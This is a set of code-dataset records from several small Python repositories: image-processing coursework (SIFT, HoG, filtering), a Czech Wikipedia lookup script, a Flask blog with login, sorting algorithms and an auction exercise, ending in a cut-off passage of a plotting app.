"blob_id": "e16343d525a6cc03451a1bc3bd5a1902c58f863a", "content_id": "63bcfdca34ee22533929048f9752ca0382a31127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2023, "license_type": "no_license", "max_line_length": 73, "num_lines": 64, "path": "/SIFT.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.ndimage.filters import convolve \nimport scipy.ndimage as ndimage\nimport pandas as pd\nfrom cv2 import cv2\n\ndef excelRead(path):\n data = pd.read_excel(path)\n return pd.DataFrame.to_numpy(data)\n\ndef gaussian_filter(sigma): \n size = 2*np.ceil(3*sigma)+1 \n x, y = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1] \n g = np.exp(-((x**2 + y**2)/(2.0*sigma**2))) / (2*np.pi*sigma**2)\n return g/g.sum()\n\ndef generate_octave(init_level, s, sigma): \n octave = [init_level] \n k = 2**(1/s) \n kernel = gaussian_filter(k * sigma) \n for _ in range(s+2): \n next_level = convolve(octave[-1], kernel) \n octave.append(next_level) \n return octave\n\ndef generate_gaussian_pyramid(im, num_octave, s, sigma): \n pyr = [] \n for _ in range(num_octave): \n octave = generate_octave(im, s, sigma) \n pyr.append(octave) \n im = octave[-3][::2, ::2] \n return pyr\n\ndef generate_DoG_octave(gaussian_octave): \n octave = [] \n for i in range(1, len(gaussian_octave)): \n octave.append(gaussian_octave[i] - gaussian_octave[i-1])\n return np.concatenate([o[:,:,np.newaxis] for o in octave], axis=2) \n\ndef generate_DoG_pyramid(gaussian_pyramid): \n pyr = [] \n for gaussian_octave in gaussian_pyramid: \n pyr.append(generate_DoG_octave(gaussian_octave)) \n return pyr\n\ndef get_candidate_keypoints(D, w=16): \n candidates = [] \n D[:,:,0] = 0 \n D[:,:,-1] = 0 \n patch = np.zeros(shape=D.shape)\n for i in range(w//2+1, D.shape[0]-w//2-1): \n for j in range(w//2+1, D.shape[1]-w//2-1): \n for k in range(1, D.shape[2]-1): \n patch = D[i-1:i+2, j-1:j+2, k-1:k+2] \n if np.argmax(patch[k]) == 4 or np.argmin(patch[k]) == 4: \n candidates.append((i, j, k)) \n return candidates\n \n\nI = excelRead(\"image.xlsx\")\npyr = generate_gaussian_pyramid(I, 4, 1, 1)\nD = generate_DoG_pyramid(pyr)\ncand = get_candidate_keypoints(D[1])\nprint(f'Keypoints: {cand}')" }, { "alpha_fraction": 0.48520389199256897, "alphanum_fraction": 0.5113677382469177, "avg_line_length": 35.67549514770508, "blob_id": "d534b21ae7a3785cf71aabfb820bc42870272d3f", "content_id": "24d3010da907322b5aafd4ad8c2a74dded82175c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5542, "license_type": "no_license", "max_line_length": 106, "num_lines": 151, "path": "/interptDetector.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.ndimage as ndimage\nimport pandas as pd\nfrom cv2 import cv2\n\ndef gaussianfilter(shape=(5,5), sigma = 1):\n m,n = [(ss-1.)/2. for ss in shape]\n y,x = np.ogrid[-m:m+1, -n:n+1]\n h = np.exp( -(x*x + y*y) / (2.*sigma**2))\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h\n\ndef excelRead(path):\n data = pd.read_excel(path)\n return pd.DataFrame.to_numpy(data, dtype=np.float64)\n\ndef ConvGauss(L: np.ndarray, filter: np.ndarray, k):\n L2 = L.copy()\n for i in range(0,k):\n L2 = ndimage.correlate(L2, filter, mode='nearest')\n return L2\n\ndef getDiffGauss(I: np.ndarray, filter: np.ndarray):\n nr, nc = I.shape\n stack = np.zeros(shape=(4, nr, nc))\n stack[0] = I\n diff = np.zeros(shape=(3, nr, nc))\n for i in range(1, 4):\n stack[i] = ConvGauss(I, filter, i)\n diff[i-1] = stack[i] - stack[i-1]\n return diff\n\ndef getExtremaSingle(diff: np.ndarray, layer: int):\n points = []\n nr, nc = diff[layer].shape\n patch = np.zeros(shape=(3,3))\n for r in range(nr):\n for c in range(nc):\n for i in range(-1, 2):\n for j in range(-1, 2):\n if r+i < 0 or c+j < 0 or r+i >= nr or c+j >= nc:\n patch[i+1, j+1] = 0\n else:\n patch[i+1, j+1] = diff[layer, r+i, c+j]\n if (np.argmax(patch) == 4 or np.argmin(patch) == 4):\n points.append((r, c))\n return points\n \ndef getExtrema(diff: np.ndarray):\n points = []\n patch = np.zeros(shape=(27))\n l,nr,nc = diff.shape\n for r in range(0, nr):\n for c in range(0, nc):\n for s in range(0,3):\n for i in range(-1, 2):\n for j in range(-1, 2):\n if r+i < 0 or c+j < 0:\n patch[3*s+(i+1)+(j+1)] = 0\n else:\n patch[3*s+(i+1)+(j+1)] = diff[s, r+i-1, c+j-1]\n #print(patch)\n if np.argmax(patch) == 13 or np.argmin(patch) == 13:\n points.append((r, c))\n return points\n\ndef saveKeypoints(I:np.ndarray, points: list, diff: np.ndarray):\n import xlwt\n from xlwt import Workbook\n\n style1 = xlwt.easyxf('pattern: pattern solid, fore_colour yellow;''align: vert centre, horiz center;')\n style2 = xlwt.easyxf('pattern: pattern solid, fore_colour aqua;''align: vert centre, horiz center')\n reset = xlwt.easyxf('align: vert centre, horiz center',\"0.0000\")\n reset2 = xlwt.easyxf('align: vert centre, horiz center')\n\n book = Workbook()\n sheet1 = book.add_sheet(\"highlight\", cell_overwrite_ok=True)\n sheet2 = book.add_sheet(\"weak\", cell_overwrite_ok=True)\n sheet3 = book.add_sheet(\"combine\", cell_overwrite_ok=True)\n sheet4 = book.add_sheet(\"diff\", cell_overwrite_ok=True)\n\n nr, nc = I.shape\n wPoints = []\n for i in range(nr):\n for j in range(nc):\n sheet1.write(i, j, float(I[i, j]), reset2)\n sheet2.write(i, j, float(I[i, j]), reset2)\n sheet3.write(i, j, float(I[i, j]), reset2)\n sheet4.write(i, j, float(diff[0, i, j]), reset)\n if (i,j) in points:\n sheet1.write(i, j, float(I[i, j]), style1)\n sheet3.write(i, j, float(I[i, j]), style1)\n if diff[0, i, j] < 1.0:\n sheet2.write(i, j, float(I[i, j]), style2)\n sheet3.write(i, j, float(I[i, j]), style2)\n wPoints.append((i, j))\n book.save(\"highlight.xls\")\n return [x for x in points if x not in wPoints]\n\ndef getPointR(I: np.ndarray, points: list, diff:np.ndarray):\n import copy\n sPoints = copy.deepcopy(points)\n Sx = np.array([-1, 0, 1])\n Sy = Sx.reshape(3,1)\n Dx = ndimage.correlate1d(diff, Sx, mode='constant')\n Dxx = ndimage.correlate1d(Dx, Sx, mode= 'constant')\n Dy = ndimage.correlate(diff, Sy, mode='constant')\n Dyy = ndimage.correlate(Dy, Sy, mode='constant')\n Dxy = ndimage.correlate(Dx, Sy, mode='constant')\n R = np.zeros(shape=diff.shape)\n nr, nc = R.shape\n for i in range(nr):\n for j in range(nc):\n if (i, j) in points:\n tr = Dxx[i, j] + Dyy[i, j]\n det = Dxx[i, j] * Dyy[i, j] - Dxy[i, j] **2\n R[i, j] = tr**2/det\n return np.around(R, 2)\n\ndef orientationAssg(I: np.ndarray, g1: np.ndarray, keypts: list):\n Sx = np.array([-1, 0, 1])\n Sy = Sx.reshape(3,1)\n Dx = ndimage.correlate1d(I, Sx, mode='nearest')\n Dy = ndimage.correlate(I, Sy, mode='nearest')\n nr, nc = I.shape\n L_mag = np.round(np.sqrt(Dx**2+Dy**2),2)\n L_ang = np.round(np.rad2deg(np.arctan(Dy/(Dx+np.finfo(float).eps))), 2)\n L_ang = np.where(Dx < 0, L_ang+180, L_ang)\n L_ang = np.where(L_ang < 0, 360+L_ang, L_ang)\n L_ang = np.round(L_ang / 45)*45\n khist = np.empty(shape=(len(keypts),8))\n l = 0\n #print(L_mag)\n for i in range(nr):\n for j in range(nc):\n if (i, j) in keypts:\n obin = np.zeros(shape=(8))\n for r in range(-2, 3):\n for c in range(-2,3):\n if r+i < 0 or c+j < 0 or r+i >= nr or c+j >= nc:\n continue\n else:\n obin[int(L_ang[r+i, c+j]//45)] += L_mag[r+i, c+j]\n khist[l] = obin\n l+=1\n if l >= len(keypts):\n return khist\n return -1\n \n\n " }, { "alpha_fraction": 0.5035552978515625, "alphanum_fraction": 0.5460030436515808, "avg_line_length": 36.13600158691406, "blob_id": "0db20afe5c8d9524f6b0ec8771d3467f3172d7ae", "content_id": "ed9aa9428292f1edfc6dc935819a2497d3c1b1d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4641, "license_type": "no_license", "max_line_length": 121, "num_lines": 125, "path": "/HoG.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nimport math\n\ndef extractImg(class_no=1, image_no=1, type=\"training\"):\n type = \"training\" if (type == \"training\") else \"test\"\n path = \"sampleImg/\"+str(class_no) + \"/\" + str(class_no) + str(image_no) + '_'+type.capitalize()+\".bmp\"\n return plt.imread(path)\n\ndef rgb2gray(rgb):\n if (rgb.ndim != 3):\n return rgb\n return np.dot(rgb[..., :3], [0.299, 0.587, 0.144])\n\ndef SobelTransform(I):\n Sx = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])\n Sy = np.array([[-1, -2, -1], [0, 0, 0], [1, 2, 1]])\n Ix = signal.correlate2d(I, Sx, mode='same')\n Iy = signal.correlate2d(I, Sy, mode='same')\n I_mag=np.sqrt(Ix**2 + Iy**2) # I_mag: gradient magnitude\n \n # Gradient orientation\n nr, nc = I.shape\n Ipr = np.zeros(shape=(nr, nc))\n I_angle = np.zeros(shape=(nr, nc))\n for j in range(nr):\n for i in range(nc):\n if abs(Ix[j, i]) <= 0.0001 and abs(Iy[j, i]) <= 0.0001: # Both Ix and Iy are close to zero\n I_angle[j, i] = 0.00\n else:\n Ipr[j, i] = math.atan(Iy[j,i]/(Ix[j,i]+np.finfo(float).eps)) # Compute the angle in radians\n I_angle[j, i] = Ipr[j, i]*180/math.pi # Compute the angle in degrees\n if Ix[j, i] < 0: # If Ix is negative, 180 degrees added\n I_angle[j, i] = 180+I_angle[j, i]\n if I_angle[j, i] < 0: # If the angle is negative, 360 degrees added\n I_angle[j, i] = 360+I_angle[j, i]\n return I_mag, I_angle \n\n\ndef HoG1(Im, Ip, nbin):\n # Unsigned gradient (i.e. 0-180)\n # Im: magnitude of the image block\n # Ip: orientation of the image block \n ghist = np.zeros(shape=(1,nbin))\n [nr1, nc1] = Im.shape\n interval = np.round(180/nbin, 0)\n for i in range(nr1):\n for j in range(nc1):\n if Ip[i, j] > 180:\n Ip[i, j] = abs(Ip[i, j] - 360)\n index = int(np.int(Ip[i, j]/interval))\n if index >= nbin:\n index = index - 1\n ghist[0, index] += np.square(Im[i,j]) #Stack \n return ghist\n\ndef Histogram_Normalization(ihist):\n # Normailize input histogram ihist to a unit histogram\n total_sum = np.sum(ihist)\n nhist = ihist / total_sum\n return nhist\n\nnr_b, nc_b = 3,3\nnbin = 9\n\ndef getFeatureVec(I, I_mag, I_angle, nr_b, nc_b):\n # Use 2x2 blocks\n nr, nc = I.shape\n nbin = 9\n nr_size = int(nr/nr_b)\n nc_size = int(nc/nc_b)\n Image_HoG = np.zeros(shape=(1, nbin*nr_b*nc_b))\n for i in range(nr_b):\n for j in range(nc_b):\n I_mag_block = I_mag[i*nr_size: (i+1)*nr_size, j*nc_size: (j+1)*nc_size]\n I_angle_block = I_angle[i*nr_size: (i+1)*nr_size, j*nc_size: (j+1)*nc_size]\n # HoG1 is a function which create the HoG histogram\n gh = HoG1(I_mag_block, I_angle_block, nbin)\n # Histogram_Normalization is a function to normalize the input histogram gh\n ngh = Histogram_Normalization(gh)\n pos = j*nbin+i*nc_b*nbin\n Image_HoG[:, pos:pos+nbin] = ngh\n return Image_HoG\n\nh1 = np.zeros(shape=(25, nbin*nr_b*nc_b)) # training\nh2 = np.zeros(shape=(25, nbin*nr_b*nc_b)) # test\nd1 = np.zeros (shape=(25,25))\nd2 = d1.copy()\nchi = d2.copy()\n\nfor i in range(1,6):\n for j in range(1,6):\n I = rgb2gray(extractImg(i,j,\"training\"))\n h1[(j-1)+(i-1)*5] = getFeatureVec(I,SobelTransform(I)[0],SobelTransform(I)[1], nr_b, nc_b)\n I = rgb2gray(extractImg(i,j,\"test\"))\n h2[(j-1)+(i-1)*5] = getFeatureVec(I,SobelTransform(I)[0],SobelTransform(I)[1], nr_b, nc_b)\n\nfor i in range(25):\n for j in range(25):\n d1[i, j] = np.around(np.sum(np.abs(h2[i, :]-h1[j, :])),4)\n d2[i, j] = np.around(np.sum(np.square(np.abs(h2[i, :]-h1[j, :]))), 4)\n chi[i, j] = np.around(np.sum(np.square(np.abs(h2[i, :]-h1[j, :])) / (h2[i, :]+h1[j, :]+np.finfo(float).eps)), 4)\n\n# 11 12 13 ... 53 54 55\n\nd1_min = np.argmin(d1,axis=1)\nd2_min = np.argmin(d2,axis=1)\nchi_min = np.argmin(chi,axis=1)\n\nacc = np.zeros(shape=(25))\nfor i in range(5):\n for j in range(5):\n acc[j+5*i] = 5*i\n\nprint(f'Matching Type: \\n{d1_min+1}')\nprint(f'Matching Type: \\n{d2_min+1}')\nprint(f'Matching Type: \\n{chi_min+1}')\n\nd1_same = d1_min - acc\nd2_same = d2_min - acc\nchi_same = chi_min - acc\nprint(np.sum(x in range(0,5) for x in d1_same) / d1_same.size)\nprint(np.sum(x in range(0,5) for x in d2_same) / d2_same.size)\nprint(np.sum(x in range(0,5) for x in chi_same) / chi_same.size)" }, { "alpha_fraction": 0.5006257891654968, "alphanum_fraction": 0.6032540798187256, "avg_line_length": 18.512195587158203, "blob_id": "cf2fc8ddd4294a8e916631b783f551af87d3be5c", "content_id": "21303ba26213948cd313d144d155fa7c33a52cb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 799, "license_type": "no_license", "max_line_length": 78, "num_lines": 41, "path": "/filtering.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.ndimage import correlate1d,correlate\n\nx = np.full((5,7),100)\nx[1,2:6] = 200\nx[2,1::4]=200\nx[2,2:5]=160\nx[3,1:6]=200\ndummy = np.full((7,9),100)\ndummy[1:6,1:8]=x\n\nSx = np.arange(-1,2,1)\nSy = Sx.reshape(3,1)\nSxx = np.tile(Sx,(3,1))\nSxx[1,:]= 2*Sx\nSyy = np.transpose(Sxx)\n\ndef HxFinder(ix,ixy,iy):\n return np.array([[ix,ixy],[ixy,iy]]), (ix*iy-ixy*ixy-0.05*(ix+iy)*(ix+iy))\n\nCx = correlate1d(dummy,Sx,output=np.float64)\nCy = correlate(dummy,Sy,output=np.float64)\n\nI2x = Cx*Cx\nIxy = Cx*Cy\nI2y = Cy*Cy\nI2x = I2x[1:6,1:8]\nI2y = I2y[1:6,1:8]\nIxy = Ixy[1:6,1:8]\n\nprint(\"I2x:\\n\",I2x)\nprint()\nprint(\"I2y:\\n\",I2y)\nprint()\nprint(\"Ixy:\\n\",Ixy)\nprint()\nfor m in range(5):\n for n in range(7):\n print(m,n)\n print(HxFinder(I2x[m,n],Ixy[m,n],I2y[m,n]))\n print()" } ]
5
sarkafa/Wiki_Lookup
https://github.com/sarkafa/Wiki_Lookup
953764fc4647cdc3679b2c734bac3dfde7b384e5
44487c04999b9953b6f9a558f7a603e86043da97
4972a4cd0f604a6528f2545bafdb36ac261e6649
refs/heads/main
2023-06-22T02:25:00.098018
2021-07-15T23:44:46
2021-07-15T23:44:46
386,451,471
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6347476840019226, "alphanum_fraction": 0.6416284441947937, "avg_line_length": 30.01785659790039, "blob_id": "7aeb14fd201f61452b4878f9f27d05391cd23fd7", "content_id": "33cb7d93300ec8767cdd08052857563e95b54128", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1832, "license_type": "permissive", "max_line_length": 148, "num_lines": 56, "path": "/wikilookup/wikilookup/wikilookup.py", "repo_name": "sarkafa/Wiki_Lookup", "src_encoding": "UTF-8", "text": "import wikipedia\n\nlibrary = {}\n\ndef run ():\n \"\"\"Spustí vyhledávání ve Wikipedii ovládané z příkazového řádku.\n \"\"\"\n print('*'*100)\n name = input('\\nZadejte název článku: \\n\\n')\n print()\n \n if name in library.keys():\n print(library[name])\n else:\n try:\n summ = wikipedia.summary(name, auto_suggest=False)\n print(summ)\n library[name] = summ\n\n except wikipedia.exceptions.PageError as e:\n no_searches = wikipedia.search(name)\n no_text = f'Článek s názvem \"{name}\" nebyl nalezen. Zadaný text se vyskytuje v článcích s tímto názvem: \\n{\", \".join(x for x in no_searches)}'\n print(no_text)\n library[name] = no_text\n\n except wikipedia.exceptions.DisambiguationError as e:\n ambig_searches = wikipedia.search(name)\n ambig_text = f'Článek s názvem \"{name}\" není jednoznačný. Název může mít tyto významy: \\n{\", \".join(x for x in ambig_searches)}'\n print(ambig_text)\n library[name] = ambig_text\n\ndef multirun():\n \"\"\"Umožní opakované spuštění vyhledávání ve Wikipedii ovládané z příkazového řádku.\n \"\"\"\n while True:\n run()\n print()\n while True:\n print('*'*100)\n answer = input('Chcete vyhledat další článek? (A/N): ').strip()\n if (len(answer) > 0) and (answer[0] in '01ANan'):\n break \n print('Odpověď musí začínat některým ze znaků \"AN\"\\n'\n 'Zkuste odpovědět znovu.')\n if answer[0] in '0nN':\n break \n print('\\nZadali jste opakování vyhledávání.\\n')\n print('\\nVyledávání bylo na Váš pokyn ukončeno.\\n')\n\ndef initialize():\n \"\"\"Inicializuje vyhledávání.\n \"\"\"\n wikipedia.set_lang(\"cs\")\n global library\n print('\\nPro zadaný název bude vypsán souhrn článku. Vyhledávání můžete opakovat.\\n')\n multirun()\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 32, "blob_id": "19858931a4ea81e20aa4f28cfecdb3b646d8645d", "content_id": "1c02fc349ca657b99b2d93745a43b99249fe9c22", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 66, "license_type": "permissive", "max_line_length": 51, "num_lines": 2, "path": "/README.md", "repo_name": "sarkafa/Wiki_Lookup", "src_encoding": "UTF-8", "text": "# Wiki_Lookup\nReturns summary of selected arcticle from Wikipedia\n" } ]
2
goodwilrv/FlaskBlog
https://github.com/goodwilrv/FlaskBlog
45facd240967c8788e8ae879187dfc477410e1c2
82461c42b2cc994307d964d3278b5327ae123179
581fa88e486670347df1594e3172edf945fc11ea
refs/heads/master
2022-12-07T01:49:21.882733
2020-08-31T13:58:29
2020-08-31T13:58:29
291,726,046
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7064393758773804, "alphanum_fraction": 0.716856062412262, "avg_line_length": 34.16666793823242, "blob_id": "36b86f0a6a405d1b63655d6018b3344a57d16bec", "content_id": "04b5ed91d5f364c242f4b55d501f41599cb9a28b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 89, "num_lines": 30, "path": "/FlaskBlog/model.py", "repo_name": "goodwilrv/FlaskBlog", "src_encoding": "UTF-8", "text": "from FlaskBlog import db,login_manager\nfrom datetime import datetime\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\nclass User(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(20),unique=True,nullable=False)\n email = db.Column(db.String(20),unique=True,nullable=False)\n image_file = db.Column(db.String(20),unique=False,nullable=False,default='default.jpg')\n password = db.Column(db.String(60),nullable=False)\n posts = db.relationship('Post',backref='author',lazy=True)\n\n def __repr__(self):\n return f\"User('{self.username}','{self.email}','{self.image_file}')\"\n\n\nclass Post(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n title = db.Column(db.String(100),nullable=False)\n date_posted = db.Column(db.DateTime,nullable=False, default=datetime.utcnow)\n content = db.Column(db.Text, nullable=False)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),nullable=False)\n\n def __repr__(self):\n return f\"User('{self.title}','{self.date_posted}')\"\n\n" }, { "alpha_fraction": 0.6461113691329956, "alphanum_fraction": 0.6530142426490784, "avg_line_length": 26.149999618530273, "blob_id": "7ac93dcad619eb5a4976a41f1811321eccefd0c8", "content_id": "3b741b85106e00fc18e2cbc0742d37ead505482f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2173, "license_type": "no_license", "max_line_length": 93, "num_lines": 80, "path": "/FlaskBlog/routes.py", "repo_name": "goodwilrv/FlaskBlog", "src_encoding": "UTF-8", "text": "\n\nfrom flask import render_template, url_for, flash, redirect\nfrom FlaskBlog.model import User, Post\nfrom FlaskBlog.forms import RegistrationForm, LoginForm\nfrom FlaskBlog import app,db, bcrypt\nfrom flask_login import UserMixin, login_user, current_user, logout_user\n\n\nposts = [\n {\n 'author':'Gautam Kumar',\n 'title':'Blog Post 1',\n 'content':'First Post content',\n 'date_posted':'May 28, 2020'\n },\n\n {\n 'author':'Manisha Bhagat',\n 'title':'Blog Post 2',\n 'content':'second Post content',\n 'date_posted':'May 29, 2020'\n }\n]\n\n\n\n\n \n\n\[email protected]('/')\[email protected]('/home')\ndef home():\n return render_template('home.html',posts=posts)\n\n\[email protected]('/about')\ndef about():\n return render_template('about.html',title = 'About Flask Title')\n\n\[email protected]('/register',methods=['GET','POST'])\ndef register():\n\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username = form.username.data, email =form.email.data,password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been Created, you can now login','success')\n\n #flash(f'Account Created for {form.username.data}!','success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register',form=form)\n\n\[email protected]('/login',methods=['GET','POST'])\ndef login():\n\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password,form.password.data):\n login_user(user,remember=form.remember.data)\n return redirect(url_for('home'))\n else:\n flash('Login Unsuccessful, Please check UserName and Password','danger')\n\n return render_template('login.html', title='Login',form=form)\n\[email protected]('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))" }, { "alpha_fraction": 0.7758620977401733, "alphanum_fraction": 0.7758620977401733, "avg_line_length": 57, "blob_id": "6af917250fda4d2dffa0ee288e22c47cc0575b7d", "content_id": "48d1150f6ea21daa6e787938411836f4b2ba7b8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 232, "license_type": "no_license", "max_line_length": 131, "num_lines": 4, "path": "/README.md", "repo_name": "goodwilrv/FlaskBlog", "src_encoding": "UTF-8", "text": "# FlaskBlog\n\nThis is a Flask project created where a flask app has been created. Here it reads some blog entries from a database and renders it.\nHere we have forms, models and routes created for Sign up , Sign in page and options.\n" } ]
3
aayush2906/data_structures-Python
https://github.com/aayush2906/data_structures-Python
26053c74defed6e0fa715b20ed30da1d1939b844
8704dbaab77babe7f7499a4458b94e9b3ebf5652
2f7a97c45fb6fbc6b8d943535ebc275ff2a07cae
refs/heads/master
2020-04-16T09:31:39.540614
2019-01-13T07:36:38
2019-01-13T07:36:38
165,467,427
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.8313252925872803, "alphanum_fraction": 0.8313252925872803, "avg_line_length": 40.5, "blob_id": "a0cab135f49dd84ccdb779335aade5afc2f39f5a", "content_id": "7644e1d27bd49f85709a9b7d7e5a7ad506db8b32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 57, "num_lines": 2, "path": "/README.md", "repo_name": "aayush2906/data_structures-Python", "src_encoding": "UTF-8", "text": "# data_structures-Python\nThis repository contains codes in python's data structure\n" }, { "alpha_fraction": 0.5567010045051575, "alphanum_fraction": 0.5592783689498901, "avg_line_length": 21.823530197143555, "blob_id": "4d488e57f671555cf1d172c5a08c8d4a27d2e846", "content_id": "35b16cd61167c3941d26877e8da6f3414a6a03e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 49, "num_lines": 17, "path": "/Selection_sort.py", "repo_name": "aayush2906/data_structures-Python", "src_encoding": "UTF-8", "text": "#selection sort\n\ndef SelectionSort(l):\n for start in range(len(l)):\n minpos=start\n for i in range(start,len(l)):\n if l[i]<l[minpos]:\n minpos=i\n (l[start],l[minpos])=(l[minpos],l[start])\n\nl=[]\nn=int(input(\"Size of list::\"))\nfor i in range(0,n):\n x=int(input(\"Enter element::\"))\n l.insert(i,x)\nSelectionSort(l)\nprint(\"Sorted list\",l)\n" }, { "alpha_fraction": 0.5418848395347595, "alphanum_fraction": 0.5575916171073914, "avg_line_length": 27.30769157409668, "blob_id": "9a824124ce6934707dbce9f9f3dcd457e5a4d855", "content_id": "8e45b8bd07ebbb87037419b03021454347e04a96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 382, "license_type": "no_license", "max_line_length": 55, "num_lines": 13, "path": "/InsertionSort.py", "repo_name": "aayush2906/data_structures-Python", "src_encoding": "UTF-8", "text": "\ndef InsertionSort(seq):\n for sliceEnd in range(len(seq)):\n pos=sliceEnd\n while pos > 0 and seq[pos] < seq[pos-1]:\n (seq[pos],seq[pos-1])=(seq[pos-1],seq[pos])\n pos=pos-1\nseq=[]\nn=int(input(\"Size of list::\"))\nfor i in range(0,n):\n x=int(input(\"Enter element::\"))\n seq.insert(i,x)\nInsertionSort(seq)\nprint(\"Sorted list\",seq) \n \n" } ]
3
nmr2701/IGCSE-Task
https://github.com/nmr2701/IGCSE-Task
550e0064f87fd518fbfbfd0a0f26deff9385454c
9946104bf24f038e9268ff0a54a10496f8701966
ce498353b32d9beb5a409de5b88263dd34754cf3
refs/heads/main
2023-03-31T04:17:22.484726
2021-04-04T17:37:50
2021-04-04T17:37:50
354,605,394
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6252120137214661, "alphanum_fraction": 0.6331260800361633, "avg_line_length": 28.433332443237305, "blob_id": "74352da782449ca587457224d83bad5e41d6718f", "content_id": "6441c3e3f9f2451ff7ced35e735eacb36ea9bb1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1769, "license_type": "no_license", "max_line_length": 111, "num_lines": 60, "path": "/final.py", "repo_name": "nmr2701/IGCSE-Task", "src_encoding": "UTF-8", "text": "Item_No = []\nItem_Description = []\nReserve_Price = []\nNo_of_Bids = []\nPlace = 0\nContinue = 1\nItem_Bid = 0\n\n\ndef datainput(Place, Item_No, Item_Description, Reserve_Price, No_of_Bids):\n while Continue == 1:\n item_no = int(input(\"Please input the Item ID: \"))\n item_description = str(input(\"Please input a brief description of the item: \"))\n reserve_price = str(input(\"Pleae input a reserve price: \"))\n no_of_bids = 0\n Item_No.append(item_no)\n Item_Description.append(item_description)\n Reserve_Price.append(reserve_price)\n No_of_Bids.append(no_of_bids)\n Place = Place + 1\n End_Input(Continue,Place)\n\ndef End_Input (Continue, Place):\n Continue = int(input(\"Input 1 to continue adding items or 0 to stop inputing items and start the auction: \"))\n if Continue == 0:\n if Place>0:\n Auction_Bid()\n else:\n print(\"You need at least 10 items to start the auction\")\n print(\"You can now input more items\")\n Continue = 1\n elif Continue ==1:\n print(\"\")\n else:\n print(\"Sorry what you inputted is not valid.\")\n End_Input(Continue,Place)\n\ndef Auction_Bid():\n for x in range (len(Item_No)):\n print(\"Item ID:\\n\", Item_No[x])\n \n print(\"Item Description:\\n\" + Item_Description[x])\n \n print(\"Reserve Price:\\n\" + Reserve_Price[x])\n \n if input(\"Please input 'Yes' if you would like to bid on an item \")==\"Yes\" or \"Yes\":\n Item_Bid = int(input(\"Please Input the Item ID of the item you would like to look at \"))\n Buyer_ID = int(input(\"Please Input your Buyer ID \"))\n for x in range (len(Item_No)):\n if Item_Bid in Item_No:\n print(Item_No[x])\n print(Item_Description[x])\n \n \n \n\n \n \n \ndatainput(Place, Item_No, Item_Description, Reserve_Price, No_of_Bids)\n\n\n\n" } ]
1
johnveitch/chainplotter
https://github.com/johnveitch/chainplotter
acd00dc4e03b541d2e7a236cb5fc4916336f4502
c23827ac74e095bb36e0643ef83943093615f4a2
626173469e9f36164c3f236c3f8b6d2e1fd0bb0a
refs/heads/master
2021-05-13T11:58:11.250597
2018-01-14T16:29:06
2018-01-14T16:29:06
117,146,600
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6011961102485657, "alphanum_fraction": 0.6092225313186646, "avg_line_length": 32.97861099243164, "blob_id": "c4d1a7c82c260b9829e10d6d36765b8567abbb2a", "content_id": "153042037f17fa8b0063572a4c5081fb4c90faf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6354, "license_type": "no_license", "max_line_length": 135, "num_lines": 187, "path": "/chainplotter", "repo_name": "johnveitch/chainplotter", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# chainplotter.py --- Simple Qt5 application embedding matplotlib canvases\n# (C) 2018 John Veitch\n\n# Based on embedding in Qt5 demo\n# Copyright (C) 2005 Florent Rougon\n# 2006 Darren Dale\n# 2015 Jens H Nielsen\n#\n\nfrom __future__ import unicode_literals\nimport sys\nimport os\nfrom pathlib import Path\nimport matplotlib\nimport numpy as np\n# Make sure that we are using 